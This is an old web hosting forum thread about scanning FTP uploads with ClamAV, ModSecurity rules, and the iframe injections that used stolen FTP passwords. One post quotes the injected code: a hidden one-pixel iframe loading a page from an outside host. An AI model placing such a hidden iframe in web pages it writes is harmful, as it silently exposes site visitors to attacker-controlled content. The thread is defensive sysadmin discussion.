LinkBack URL
About LinkBacksIt can't. But pure-ftpd can run custom script after every upload, and you can call clamav in that script.Originally Posted by Silver_2000
It can't. But pure-ftpd can run custom script after every upload, and you can call clamav in that script.
Thanks for spiral's post, now I'm working on it.
█ Host1Plus.com - Professional Multi-Location Web Hosting Service.
proftpd includes external clamav support for uploads.
Michael Shinn
Prometheus Global - home of gotroot.com and Atomicorp and
Secure Your Server Now with Atomic Secured Linux!
seems that pureftp can also scan
but Im unable to get the config here to work
Integrate pure-ftpd with clamav - CPanelDirect
would be a great addition
everything looks right - ive triple checked the steps BUT the sample file is NOT removed
clamav is capable of scanning files, period. That means everything that is a file. Actually it can scan more than just files, it can scan streams of data for virus identities.
So can you make it scan files uploaded by XYZ method, sure you can.
I do know that pure-ftpd allows you to set an antivirus to scan uploaded files.
cPanel allows users to scan their entire home directory with clamav!!!
If you want, you can probably make ssh do the same with some coding changes.
modsec rule
Hello everyone,
Is there a modsec rule that should help prevent this iframe hack? Ihave some sites being infected with this iframe hack and although my servers have mod security installed in them, I am wondering if there are some modsec rules that can filter this out.
I didn't try this clamAV combination with FTP to scan uploaded files but I was told that this might cause problems for the users. I was told that there might be delay in uploading files, so upload can take some tim based on how heavy is file.
Can someone, who is using this combination, confirm this and what can we expect ?
The latest solution for Cpanel/PureFTP servers:
SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...- cPanel Forums
would be nice to have something like this come from cpanel integrated in WHM (considering this thread is now 2 years old and 600+ posts long)
One of my clients today attacked with iframe:
<iframe src="http://murianin.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
Code was at the bottom of almost every .htm file in his account. Not just index named files but all others too.
yeah, that would be a nice gesture from the part of cpanel. Cpanel provides us with almost all features. This one is something which would benefit the entire cpanel user community.
I actually wrote a process that scans the entire server for I-Frame attacks both old and the newer more sophisticated encrypted rewrite hacks, notifies the administrators by email, suspends and locks accounts that have been compromised, deep scans all files on detected compromised accounts, integrates with CSF and blocks the original attacker and notifies the account owner they need to scan their home computers ASAP for the trojan that stole their password in the first place.
It also monitors FTP activity checking uploaded files and looking for suspicious patterns such as mass uploads of "index.*" files at once, changes in typical IP netblocks -- especially those from China, etc.
About 100 or so of my web hosting / data center clients have been upgraded with these new scanner processes with good results and a lot more hacks have been detected and blocked than would have been otherwise.
The main scanner is now part of my Security Toolkit; However, I've also developed a lighter standalone version for those who think they may be having I-Frame attack issues or need better tracking of that.
--Spiral
PS: I'm currently working on WHM integration for the above
Last edited by Spiral; 11-19-2009 at 09:45 PM.
Wow, this sounds great. How do we get ahold of that? I didn't see it on your site....
Reply With Quote